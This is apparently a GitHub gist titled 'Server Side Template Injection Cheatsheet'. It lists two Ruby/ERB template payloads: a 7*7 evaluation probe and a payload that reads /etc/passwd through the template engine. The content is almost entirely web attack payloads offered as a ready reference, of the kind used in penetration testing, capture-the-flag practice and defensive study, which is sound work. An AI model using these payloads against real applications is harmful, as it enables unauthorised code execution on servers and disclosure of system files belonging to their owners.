Skip to content

Instantly share code, notes, and snippets.

@leveled
Created January 23, 2021 18:45
Show Gist options
  • Save leveled/4e1b85aa50f931ed10dd1754f3b96f84 to your computer and use it in GitHub Desktop.
Save leveled/4e1b85aa50f931ed10dd1754f3b96f84 to your computer and use it in GitHub Desktop.
Server Side Template Injection Cheatsheet
#Ruby/ERB
<%= 7 * 7 %>
##Check
<%= File.open(‘/etc/passwd’).read %>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment